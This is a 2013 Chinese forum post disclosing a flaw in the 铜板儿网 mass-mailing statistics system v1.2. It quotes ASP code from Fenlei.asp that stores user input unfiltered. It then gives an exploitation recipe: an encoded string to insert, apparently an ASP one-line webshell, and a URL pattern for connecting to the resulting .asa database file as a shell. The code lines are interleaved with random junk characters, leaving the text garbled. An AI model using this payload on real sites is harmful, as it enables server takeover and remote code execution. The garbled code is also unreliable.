找回密码
 立即注册
查看: 3029|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
( ^: M6 `. y+ r, Q% S8 e3 u, u3 ~/ r1 z" i# V4 I
IF Request.QueryString("Action")="del" Then
) b1 e8 I4 |! c& [ID=Request.QueryString("ID")
1 D# b, d" V1 @/ y9 U2 f* KIF Countss ("tui","Fenlei",ID )<>0 then 5 c3 d" Y! u; l+ d, l. b6 g' }
'略
8 A2 Q" ~- ^8 H! M$ a- JIF Request.QueryString("Action")="Add" Then
7 s) e9 a! a+ p- e* g1 z+ dTname=Request.Form("Typename") / v! R( q6 m7 c, L; Q" P6 v& r
Set Rs=Server.CreateObject("adodb.Recordset") - g8 c7 I* u6 ~' q- {
Sql="Select * From Fenlei Order by id Desc " ) P$ [9 U: h7 a3 L) ~2 H- a6 m: K( t5 d
Rs.Open Sql,Conn,1,3
' K) h5 ^0 p3 p3 e2 s, i- ]: qRs.Addnew 1 p; o; Z7 l3 f8 O  w
Rs("Typename")=Tname
- i7 X& q" H" x# Y0 {'略
* u: }& L' k  `# t: gSet Rs=Server.CreateObject("adodb.Recordset")
3 y3 Q3 D6 }) i+ @Sql="Select * From Fenlei Order by id Desc "
- q) W. M% O. j; J2 P6 wRs.Open Sql,Conn,1,1 ( [7 Y5 ~% U& I0 v2 y! v6 F1 `
'略
5 ~$ x+ v2 c9 B. o%>! q+ [- g2 K+ N

+ _7 j  w% h" p, h
( v* x  C. C0 E6 c8 P. E. ^ ; k7 I) w0 I3 K+ j
没有过滤,直接写入数据库。
1 |6 ?4 y% Z, H( A% Z+ p1 u2 q 8 y% v) Q) _- R4 |4 y
利用方法:
' z4 I% b1 G* Z# c1 O& W
* U5 b2 D6 _0 T8 a( _4 y5 Z插入:┼攠數畣整爠煥敵瑳∨≡┩>( ^$ P0 {) g& q0 c5 p  ], k- C# z' E

3 y7 u. R: G7 b; n8 t; b
2 p* f& U+ U. Z7 H2 Q& d1 s连接: http://www.xxx.com/###tongbaner.asa + D1 |$ i" Z0 I
'默认安装文件:
* w0 r* T1 Y4 O( p& I'install.asp2 a0 W" F8 D3 `" g& z' J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表